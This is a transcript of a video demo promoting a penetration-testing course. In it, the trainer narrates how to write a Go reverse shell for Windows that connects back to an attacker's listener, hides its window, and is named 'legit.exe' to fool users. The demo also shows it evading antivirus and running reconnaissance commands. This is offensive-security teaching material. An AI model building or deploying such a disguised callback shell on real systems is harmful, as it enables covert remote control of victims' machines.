Hey everyone, my name is Brian Furman, and I'm from Black Hills Information Security. I'm going to be teaching the Advanced Testing, Evaluating, and Breaking of Security Software course that will be offered at Black Hat Asia 2016 on March 29th through the 30th. And here I just want to give you a quick sneak peek of one of the many awesome things that we're going to be covering in this course. So let's talk about GoCat. What is Go? Well, it's a language developed by Google and also some of the same people who helped develop the original C programming language. So it's a compiled language, so you can think speedy, fast, but it also has the usability of a language like Python. So you can jump right in, you can start using it without a whole lot of background, without a whole lot of having to dive deep into the language. And so what's our plan of attack? We're going to write a shell for Windows. We're going to write this in Golang. We'll end up with a raw executable that we can execute on Windows, but we don't actually have to write it on Windows. We're going to write it on a Kali virtual machine, deploy it over to Windows, and then connect it back to our Kali machine via Netcat listener that we'll have set up waiting for us. So let's hop over to the VM. It's actually the virtual machine that you'd be getting if you take the course. It's already set up with a lot of cool tools, including Golang, and also some plugins for Vim that'll make Go look nice and pretty when we're writing it. So I just want to point out quick that there is a specific folder structure that Go likes you to use, but we're not going to cover that here. We'll talk about that in the class, but for now let's go ahead and let's create a file. So we'll do vim shell.go. And the first thing we need to do is we need to say that this is our main package. So we'll do package main. That tells Go that if we have multiple files, this is the one that it needs to go to first. This is going to contain our main function somewhere in this package main. So the next thing that we're going to do is we're going to import some extra libraries, some extra packages. We're going to import buff.io, net, os, /exec, and syscall. And so these packages give us some extra functionality that we'll need for the program. For those of you who have written in C, C++ before, this probably looks pretty familiar to you, probably similar to pound include. It's pretty much the same thing. Next, we're going to define our main function. This tells Go the point at which it starts executing our program. So when we run the program, this is the first place that it's going to look. This is the first place that it's going to start executing. This is in this main function, also similar to C, C++. Now, before we go on, the next thing that we're going to do is we're going to set up the connection from the Windows machine back to our listener. But before we can do that, we need the IP address of this machine. So let's go ahead and save this and exit. Just exit :WQ. Let's do an ifconfig, and we can see our address is 192.168.0.112. So remember that. Hop back into the file. All right, so let's set up our connection. So for the connection, I'm just going to call it C. So let's go ahead and let's call it con. Make things clear. And this underline, we're not going to talk about that here. We'll talk about that more in the course. But for now, just know that we need this. We need con, comma, that little underline. And we're going to assign it the value of net.dial. We're going to say a TCP connection. Now we're going to give it that IP address, 192.168.0.112. And we need to give it a port. I'm just going to use 57702. All right, so what this does is it sets up the connection back to our listener on 192.168.0.112, port 57702, and it assigns this connection to the object, to the variable con. The next thing we want to do is we're going to set up an infinite loop. So after our connection is made, we want to be able to start issuing commands to that connection, and we want to get feedback, and then we want to do that again. So we'll give it a command, it'll execute the command, and it'll give us feedback, and then we'll repeat. And so we're going to use an infinite loop. Now, those of you familiar with other languages might be thinking, well, why aren't we using a while loop? Well, while loops actually don't exist in Go. We have for loops. We can construct for loops in such a way that they are a while loop, or an infinite while loop in this case, by just saying for without any parameters. The next thing we're going to do is we're going to need to get the input. So this is going to be grabbing the input that we're sending over to this program. So from the Kali machine, we're going to send a command to the Windows machine, to this shell on the Windows machine. We need to grab that command. And so here, I'm going to call this in_command. And we need the underline again. And to get this command, we're going to use buff.io. We're going to say new reader. We're going to read from con, our connection, and we're going to read a string until the end of the line. One too many. There we go. Next thing we're going to do is we're going to execute this command. So let's do cmd equals exec.command /c and in command. So now what this does is the exec is saying we want to execute something on the operating system. What we're going to exec is actually going to be the cmd.exe program. And then we're going to pass in an argument. That argument that we're passing into cmd.exe is going to be our in command. So we're effectively just executing a command on the command shell. So let's go ahead and let's just call this cmd_res to make this a little bit clearer. So we're going to do cmd_res for result, and we're going to set that equal to the execution of the command.exe program on Windows, passing in our command as an argument. Cool. So the next thing we're going to do is we actually want to hide the window. If we don't put in this line, and I'm not going to go through all the details of this line right now, but just know that if we don't put in this line, what's going to happen when we run our program is a window is actually going to pop up. The user will see that, and that's not what we want. We want this to be hidden. We want this to be stealthy. And so what this will do is this will take our command window, and it will go ahead and it will hide it. Now, we want to know what happened. What was the result? If we just run a command and we don't see the result, that's not very useful. And so let's go ahead and let's grab the output. Again, we'll do output, comma, underscore. And let's set that equal to our command result dot output. Awesome. So now we've got the output of our command that we just ran. And we need to get this back to our Kali machine. We want to get this back to our machine, to our listener machine, so that we can actually see what the result was, what was the value. And to do that, we're going to do con.write. We're going to write a byte stream, and we're going to write the output. And that's it. That's actually our entire basic shell. So again, just recapping. We set up connection from the Windows machine to the listener on our Kali machine, and it's going to go into this variable called con. That's how we can interact with that connection. We're going to read in the command. This command is going from our Kali machine to the Windows machine via the netcat listener. Is the program that we're going to be using on the Kali machine. We're going to read in that command. We're then going to execute cmd.exe on the Windows machine, passing in our command as the argument. We're going to grab the result of that. We're going to hide the window. We're going to grab the output of that, the actual output of the command, and then we're going to write that back to our Kali machine via that same connection that we just set up, and that's it. So let's go ahead and let's save this and let's exit. And now we need to compile it. So to compile it, we first need to specify the operating system. So we're cross-compiling, so we're going to specify that even though we're on a Kali VM, we want the target operating system to be Windows, and we just do that with this GOOS equals Windows flag. Next, we need to specify the architecture, which is actually going to be garch. And that's going to be 386 in this case. Sorry, GoCat. That's going to be 386 in this case, because we're not compiling for a 64-bit machine. We're compiling, in this case, for a non-64-bit machine, 32-bit machine. We're just going to specify a 386 as the architecture. Now we can actually issue our go build command. Go build is what's going to do our work. So it's actually going to compile the program. We need to pass in some flags, just one flag actually. So we do -ld flags -h equals Windows GUI. And this is needed for that for the hiding of the window, for that command that we put in, that one line that's going to prevent this the shell from actually showing up when we run it on the Windows machine, that is. Next, we'll specify an output file, -o legit.exe, so the user knows that it's legit, and we'll specify the input file of shell.go. So it's building it. Now you can see we've got the legit.exe program, just like that. We've cross-compiled to Windows. Now let's serve it up and get it over to Windows. To do that, there's quite a few different ways you could do this, but I'm just going to set up a Python simple HTTP server. Like that. So I'm serving up on port 8000, just the default port. Hop over to my Windows machine. Let's go to the address of my Kali VM, HTTP 192.168.0.112, port 8000. All right, let's grab, here it is, legit.exe. Let's go to the downloads folder, and let's scan it. Let's scan for viruses. Here I'm using Symantec as an antivirus, very popular, very effective, but unfortunately not against our custom shell. Oh, you can see it completed and everything's great, right? So just to show you, it is running, it was running, and now just popping up in the console so you can see it's protected, everything's up to date, everything is running as it should be. Go ahead and just scan it again, just to show you. Yep, good to go. Awesome. So let's go ahead and let's pop back over here. Let's kill the server and let's start up a netcat listener. Netcat ncat-l, and let's serve up on that port 57702. Now we're listening. Let's go over here. Run the program. All right, it ran, nothing popped up. Good, just what we wanted. Let's go over here. Nothing happened, but what happens if we type dir? Oh, check that out. And we can see there's our legit.exe program. How about who am I? IE user. Cool. So what about net user IE user? Let's get some information about this user. Cool, got some information there. Got the group membership, local groups, global groups, last logon, all that good stuff. You can also find out some more information, net accounts, password policy, all that good stuff. You can issue whatever commands you'd want to issue on the command line, most commands. You can issue those here, and you can get the feedback. Awesome, huh? And so that's pretty much all I wanted to show you here in this demo. If you take the course, we're going to be, that's just one of the things we'll be looking at, and we'll actually be taking that GoCat, that basic shell, and we'll be adding a lot more functionality to it. So you see that's just kind of the bare bones, but it does get you a shell onto that Windows machine with your own custom program that you wrote on Kali, on Linux. You didn't even have to write it on Windows, using freely available tools. And you saw just how quickly and how easy it was to get that set up and going. And of course, best part, antivirus doesn't have a clue. So I hope you enjoyed that demo. And if you want to see a lot more of this awesome stuff, I suggest taking the Advanced Testing, Evaluating, and Breaking of Security Software course, Black Hat Asia 2016, March 29th and 30th. Again, my name is Brian Furman from Black Hills Information Security. You can find me on Twitter at FullMetalCache. You can also hit me up on Gmail, fullmetalcache@gmail.com, or you can reach me via brian@blackhillsinfosec.com. Thanks, and I hope to see all of you at the class.